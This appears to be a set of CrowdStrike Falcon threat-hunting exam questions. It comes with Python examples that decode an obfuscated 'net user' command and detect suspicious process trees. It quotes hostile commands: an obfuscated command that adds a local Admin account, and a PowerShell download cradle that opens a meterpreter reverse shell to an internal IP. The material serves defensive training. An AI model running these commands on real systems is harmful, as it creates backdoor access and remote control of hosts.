CCFH-202b CrowdStrike Certified Falcon Hunter Questions and Answers
You are investigating a suspicious file execution on a host and need to understand how the process interacted with the system. Which combination of key data event types should be used in this scenario to understand the process execution and its network activity?
While performing a threat hunt in your environment, you decide to identify rare occurrences of user agent strings over the past 30 days. Which query will highlight those results using CQL?
You want to find all executions of a file on older Windows operating systems. You also want to include the Windows OU and focus on OUs with highly privileged systems and users. Which query will include the file name, operating system, and OU?
Which statement will filter for all events that correspond to a new scheduled task registered by the user "Doris"?
According to the MITRE ATT&CK Framework, if an adversary is pursuing the Credential Access tactic through OS Credential Dumping, what is the specific technique name that you can also use as a filter on the Detections page to find similar activity?
You suspect that a user is abusing their admin privileges and you want to see the recent commands they have been utilizing. Which Investigate search will identify this?
What will the following obfuscated command do?
cmd /c "set x=^n^e^t & set y=@er & set yy=z & set z=r & set r=remove & set f=Domain+ff & set ff=Admin & set g=gumball@ & echo %x%%y:@=us% /%z:r=add% %ff% %g:@=r% | cmd"
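The command above relies on two cmd.exe behaviours: percent-variables are expanded when a line is parsed, so in the outer `cmd /c` the `%x%...` tokens are still undefined and are echoed literally, and the inner `cmd` that receives the echoed text inherits the environment the `set` commands built and expands them on execution. The following script is an added worked example (not part of the exam material) that replays that second expansion offline, including the `%var:old=new%` substitution syntax and the trailing spaces cmd keeps in each `set` value (which is what joins `%x%%y:@=us%` into `net user`). The `OBFUSCATED` string is a copy of the command from the question.

```python
import re

# Copy of the obfuscated command line from the question above (constructed input).
OBFUSCATED = (
    'cmd /c "set x=^n^e^t & set y=@er & set yy=z & set z=r & set r=remove '
    '& set f=Domain+ff & set ff=Admin & set g=gumball@ '
    '& echo %x%%y:@=us% /%z:r=add% %ff% %g:@=r% | cmd"'
)

# %name%  or  %name:old=new%
VAR_RE = re.compile(r'%([^%:]+?)(?::([^%=]+)=([^%]*))?%')


def parse_inner(cmdline):
    """Split `cmd /c "..."` into the environment the `set` calls build and the echoed text.

    Trailing spaces before `&` are kept deliberately: cmd.exe stores them as part
    of the value, so x becomes "net " and "%x%%y:@=us%" expands to "net user".
    Carets are cmd's escape character and are dropped when the value is stored.
    """
    m = re.fullmatch(r'cmd /c "(.*)"', cmdline)
    if not m:
        raise ValueError('expected a cmd /c "..." wrapper')
    first_stage = m.group(1).split('|', 1)[0]   # everything before the `| cmd` pipe
    env, echoed = {}, None
    for part in first_stage.split('&'):
        part = part.lstrip()
        if part[:4].lower() == 'set ':
            name, _, value = part[4:].partition('=')
            env[name.strip().lower()] = value.replace('^', '')
        elif part[:5].lower() == 'echo ':
            echoed = part[5:]
    return env, echoed


def expand(text, env):
    """Expand %name% and %name:old=new% the way the receiving cmd.exe does."""
    def sub(m):
        name, old, new = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)            # undefined variables stay literal
        value = env[name]
        if old is not None:              # substring substitution, case-insensitive
            value = re.sub(re.escape(old), lambda _: new, value, flags=re.IGNORECASE)
        return value
    return VAR_RE.sub(sub, text)


def deobfuscate(cmdline):
    """Return the command the inner cmd.exe would actually run, with padding collapsed."""
    env, echoed = parse_inner(cmdline)
    return ' '.join(expand(echoed, env).split())


if __name__ == '__main__':
    print(deobfuscate(OBFUSCATED))
```

Unused decoys such as `yy`, `r` and `f` are set but never referenced; only the variables named inside the `echo` matter, and the result is a `net user ... /add` that creates a local account named Admin with the password gumballr.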
Your organization uses an internally developed application for operations. The application is triggering Indicators of Attack (IOA) detections for vulnerable driver usage on servers where Falcon was just installed. After reviewing the application, you determine that application behavior is expected. What will reduce risk in the environment the most?
You want to use result data from an Advanced Event Search to create a custom dashboard that will display the total number of detections in a seven-day time period. Which widget will allow you to display the total number of detections as a single value digit?
You receive an alert for the following process tree:
w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe
Which of the following describes what has occurred?
You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:
powershell.exe -WindowStyle Hidden -NoProfile -NoExit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force
What is this command doing?
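Both of the preceding questions (the w3wp.exe process tree and the WmiPrvSE-launched PowerShell download cradle) come down to parent/child relationships that a hunter can express as rules over process events. The script below is an added example, not part of the exam material or of the Falcon product, that builds process ancestry from a constructed set of events and applies two such rules: a shell or reconnaissance binary with an IIS worker process (w3wp.exe) anywhere above it, and powershell.exe started by WmiPrvSE.exe with a download-cradle command line. The event field names and the sample events are illustrative and do not follow Falcon's schema.

```python
# Constructed sample events modelled on the two process trees in the questions above.
# Field names are illustrative, not Falcon's event schema.
EVENTS = [
    {"pid": 100, "ppid": 1,   "name": "services.exe",   "cmdline": "services.exe"},
    {"pid": 200, "ppid": 100, "name": "w3wp.exe",       "cmdline": "w3wp.exe -ap DefaultAppPool"},
    {"pid": 201, "ppid": 200, "name": "powershell.exe", "cmdline": "powershell.exe -c cmd"},
    {"pid": 202, "ppid": 201, "name": "cmd.exe",        "cmdline": "cmd.exe /c whoami & net localgroup administrators"},
    {"pid": 203, "ppid": 202, "name": "whoami.exe",     "cmdline": "whoami"},
    {"pid": 204, "ppid": 202, "name": "net1.exe",       "cmdline": "net1 localgroup administrators"},
    {"pid": 300, "ppid": 100, "name": "WmiPrvSE.exe",   "cmdline": "WmiPrvSE.exe"},
    {"pid": 301, "ppid": 300, "name": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -NoProfile -NoExit -c IEX ((New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); "
                "Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force"},
    # Benign control: scheduled inventory script under svchost, should not be flagged.
    {"pid": 400, "ppid": 100, "name": "svchost.exe",    "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 401, "ppid": 400, "name": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

WEB_WORKERS = {"w3wp.exe"}                                   # IIS worker process
SHELLS_AND_RECON = {"cmd.exe", "powershell.exe", "whoami.exe", "net.exe", "net1.exe"}
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "invoke-shellcode")


def ancestry(events):
    """Map each pid to its root-first chain of process names (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}

    def chain(e):
        names, seen, cur = [], set(), e
        while cur is not None and cur["pid"] not in seen:
            seen.add(cur["pid"])
            names.append(cur["name"])
            cur = by_pid.get(cur["ppid"])     # None once we reach an unknown parent
        return names[::-1]

    return {e["pid"]: chain(e) for e in events}


def hunt(events):
    """Return (rule, pid, chain) findings for the two patterns from the questions."""
    by_pid = {e["pid"]: e for e in events}
    chains = ancestry(events)
    findings = []
    for e in events:
        chain = chains[e["pid"]]
        ancestors = [n.lower() for n in chain[:-1]]       # everything above this process
        name = e["name"].lower()

        # Rule 1: web-server worker anywhere above a shell or recon binary (web shell pattern)
        if name in SHELLS_AND_RECON and any(a in WEB_WORKERS for a in ancestors):
            findings.append(("webserver_spawned_shell", e["pid"], " > ".join(chain)))

        # Rule 2: WMI provider host launching PowerShell that fetches and runs remote code
        parent = by_pid.get(e["ppid"])
        if name == "powershell.exe" and parent and parent["name"].lower() == "wmiprvse.exe":
            cl = e["cmdline"].lower()
            if any(marker in cl for marker in CRADLE_MARKERS):
                findings.append(("wmi_powershell_download_cradle", e["pid"], " > ".join(chain)))
    return findings


if __name__ == "__main__":
    for rule, pid, chain in hunt(EVENTS):
        print(f"{rule:32} pid={pid:<4} {chain}")
```

Rule 1 fires on every descendant of w3wp.exe that is a shell or recon tool, so the finding for net1.exe carries the full chain from the alert; rule 2 fires only when the parent is WmiPrvSE.exe and the command line shows in-memory download and execution, so the inventory script started under svchost is left alone.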
Which Falcon feature creates a graphical view of users, endpoints, and the connections between them by logon type?
What can a hunter add at the end of a search string in Advanced Event Search to identify outliers when quantifying the results?